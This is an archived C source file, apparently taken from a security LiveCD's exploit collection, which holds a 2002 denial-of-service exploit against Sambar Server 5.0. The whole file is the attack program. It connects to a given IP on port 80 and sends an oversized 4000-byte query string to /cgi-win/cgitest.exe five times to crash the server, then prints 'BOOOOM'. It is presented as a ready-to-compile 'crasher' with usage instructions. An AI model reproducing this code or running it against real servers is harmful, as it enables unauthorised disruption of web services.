home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / sambar / sambardosexploit.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  93 lines
  1. /*********************************************************************
  2. **********
  3. **
  4. **               06.02.2002 - GREETZ TO WbC-BoArD & YAST CREW
  5.  
  6. **
  7. **               Compiled with gcc under linux with kernel 2.4.17
  8.  
  9. **
  10. **               Programname: Sambar Server 5.0  Manufacturer:Jalyn
  11.  
  12. **
  13. **********************************************************************
  14. *********/
  15.  
  16. #include <sys/types.h>
  17. #include <sys/socket.h>
  18. #include <netinet/in.h>
  19. #include <arpa/inet.h>
  20. #include <netdb.h>
  21. #include <stdio.h>
  22. #include <unistd.h>
  23. #include <stdio.h>
  24. #include <string.h>
  25.  
  26. #define SERVER_PORT 80
  27. #define MAX_MSG 100
  28.  
  29.   int sd, rc, i,j;
  30.   char buf[5000];
  31.   char msgtosnd[5024];
  32.   char msgtoget[102400];
  33.   char source[200000];
  34.   struct sockaddr_in localAddr, servAddr;
  35.   struct hostent *h;
  36.   FILE *f1;
  37.  
  38. int main (int argc, char *argv[]) {
  39. printf("Sleepy of Yast presents \"Sambar Server Production 5.0
  40. Crasher\"\n");
  41. if(argc != 2)
  42. {
  43. printf(">>> usage: %s <ip>",argv[0]);exit(0);
  44. };
  45. h = gethostbyname(argv[1]);
  46. if(h==NULL)
  47. {
  48. printf("%s: unknown host '%s'\n",argv[0],argv[1]);
  49. exit(1);
  50. }
  51. servAddr.sin_family = h->h_addrtype;
  52. memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
  53. h->h_length);
  54. servAddr.sin_port = htons(SERVER_PORT);
  55. sd = socket(AF_INET, SOCK_STREAM, 0);
  56. if(sd<0)
  57. {
  58. perror("cannot open socket ");
  59. exit(1);
  60. }
  61.  
  62. localAddr.sin_family = AF_INET;
  63. localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
  64. localAddr.sin_port = htons(0);
  65. rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));
  66.  
  67. if(rc<0)
  68. {
  69. printf("%s: cannot bind port TCP %u\n",argv[0],SERVER_PORT);
  70. perror("error ");
  71. exit(1);
  72. }
  73. rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
  74. if(rc<0)
  75. {
  76. perror("cannot connect ");
  77. exit(1);
  78. };
  79. strcpy(buf,"A");
  80. fprintf(stderr,"Entering Loop\n");
  81. for(i=1;i<4000;i++)
  82. {
  83. strcat(buf,"A");
  84. }
  85. sprintf(msgtosnd,"GET /cgi-win/cgitest.exe?%s HTTP/1.1\nhost:
  86. localhost\n\n\n",buf);
  87. for(j=0;j<5;j++)
  88. {
  89. send(sd,msgtosnd,5024,0);
  90. }
  91. printf("\n\n BOOOOM");
  92. }
  93.